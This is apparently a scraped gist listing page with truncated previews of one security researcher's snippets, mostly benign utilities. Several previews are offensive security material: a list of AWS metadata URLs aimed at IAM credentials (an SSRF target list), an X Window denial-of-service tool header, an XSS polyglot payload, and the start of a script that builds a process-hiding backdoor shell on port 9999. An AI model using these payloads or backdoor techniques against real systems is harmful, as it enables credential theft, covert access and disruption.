I hereby claim:
- I am epinna on github.
- I am epinna (https://keybase.io/epinna) on keybase.
- I have a public key whose fingerprint is 05F1 954C E1FB 4611 F742 8DF4 2041 EEA1 A192 B451
To claim this, I am signing this object:
#!/usr/bin/env python | |
# coding: utf-8 | |
# | |
# Copyright (C) Michael Ihde 2004 <[email protected]> | |
# | |
# Distributed under the Python License | |
# | |
# iprange is a useful module that creates iprange generators similar | |
# to python's xrange. This allows you to write statements such as | |
# |
#!/usr/bin/env python | |
# encoding: utf-8 | |
# Setup introductions: | |
# Open Namecheap website, select a domain (e.g. abc.com) then go to Advanced DNS | |
# (Accounts > Domain List > Advanced DNS) | |
# Insert an "A + Dynamic DNS Record", with hostname (e.g. my) and type whatnever IP address. | |
# Edit scripts for proper HOSTNAME (e.g. my.abc.com) and APIKEY (Dynamic DNS Password). | |
# Run and have fun! |
## AWS | |
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories | |
http://169.254.169.254/latest/user-data | |
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] | |
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME] | |
http://169.254.169.254/latest/meta-data/ami-id | |
http://169.254.169.254/latest/meta-data/reservation-id | |
http://169.254.169.254/latest/meta-data/hostname | |
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key |
FROM ubuntu:latest | |
ARG LOCALE=en_US | |
ARG CHARMAP=UTF-8 | |
ARG DEBIAN_FRONTEND=noninteractive | |
RUN dpkg --add-architecture i386 | |
RUN apt-get update && apt-get --yes dist-upgrade && apt-get install --yes --no-install-recommends \ | |
autoconf \ | |
apache2 \ |
# Tested with Python 3.5.2 | |
from config import LOGLEVEL | |
import logging | |
class SrvLogFormat(logging.Formatter): | |
err_fmt = "[E] %(msg)s" | |
warn_fmt = "[!] %(msg)s" | |
dbg_fmt = "[D] %(module)s: %(lineno)d: %(msg)s" |
/* 2/5/00 1.0 | |
Xsh0k.c by n0rby -- NeURaL CoLLaPsE CrEw. | |
main code by AcidCrash -- NeURaL CoLLaPsE CrEw. | |
This dos simply creates a sequence of socket connections to Xwindow port | |
of a remote server. This cause a very disturbing effect to the XWindow user. | |
There are many and various effects: frequently Xwindow slows so much that | |
it's quite impossible to start new X programs; sometimes Xwindow don't | |
recognizes some keys or mouse input, and, more rarely it crash and | |
leave the user to the bash. |
I hereby claim:
To claim this, I am signing this object:
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e |
#!/usr/bin/env python | |
# This script prints a simple one-liner memory-only backdoor agent which hides from ps. | |
# It renames itself within the process list using a really hackish (AND POTENTIALLY DANGEROUS) /proc/self/mem rewrite | |
# and spawns a shell on port 9999. Just an experiment, there are simplest way to run unnoticed in the | |
# process list (see the technique used by EmPyre: https://github.com/adaptivethreat/EmPyre) | |
template = """ | |
import sys,re,pty,os,socket |
''' | |
Set ANSI Terminal Color and Attributes. | |
http://code.activestate.com/recipes/574451-handling-ansi-terminal/ | |
''' | |
from sys import stdout | |
esc = '%s['%chr(27) | |
reset = '%s0m'%esc |